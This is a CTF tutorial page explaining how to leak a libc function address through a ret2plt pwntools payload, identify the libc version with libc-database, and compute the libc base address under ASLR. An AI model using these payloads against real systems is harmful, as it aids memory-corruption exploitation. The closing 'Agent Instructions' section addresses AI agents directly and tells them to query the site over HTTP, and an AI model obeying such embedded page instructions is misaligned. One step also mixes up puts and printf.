# Leaking LibC If the ASLR is enable, an address of a libc function will be leak in order to know the address of the others libc functions. ## Leaking Libc function address In order to obtain an address, the [ret2plt ](broken://pages/YhXrENTBcmoxFBMwPaNs)attack can be used : ```python from pwn import * elf = ELF('./chall') payload = flat( b'A' * padding, elf.plt['puts'], elf.symbols['main'], elf.got['puts'] ) ``` Here the process will print the address of the `puts` function. ## Finding LIBC library To determine which version of the libc library is being used by the program, it is necessary to find which library version contains the 'puts' function at the given address. This can be done by **searching through the available library versions** and **comparing the addresses of the 'printf' function**. Once the library version that contains the 'printf' function at the given address is found, it can be determined that this is the version of libc being used by the program. Fortunately, several databases and tools are available to make this process easier such as "[Libc database search engine](https://libc.blukat.me)" or "[libc database](https://github.com/niklasb/libc-database.git)" ```bash $ ./find puts 0xf7d5f460 ubuntu-old-glibc (libc6_2.26-0ubuntu2.1_amd64) ubuntu-old-glibc (libc6_2.26-0ubuntu2_amd64) debian-glibc (libc6_2.31-13+deb11u5_i386) ubuntu-old-eglibc (libc6-i386_2.13-20ubuntu5_amd64) $ ./download libc6_2.26-0ubuntu2.1_amd64 Getting libc6_2.26-0ubuntu2.1_amd64 -> Location: http://old-releases.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.26-0ubuntu2.1_amd64.deb -> Downloading package -> Extracting package -> Package saved to libs/libc6_2.26-0ubuntu2.1_amd64 ``` {% hint style="info" %} ### Other functions to leak ```python puts printf __libc_start_main read gets ``` {% endhint %} ## Getting libc base address ```python libc = ELF("libs/libc6_2.26-0ubuntu2.1_amd64") libc.address = leak - libc.symbols[func_name] #Save libc base log.success("LIBC base @ %s" % hex(libc.address)) ``` ```bash [+] LIBC base: 0xf7d70000 ``` {% hint style="info" %} Note that final libc base address must end in 00. If that's not your case you might have leaked an incorrect library. {% endhint %} ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/leaking-libc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.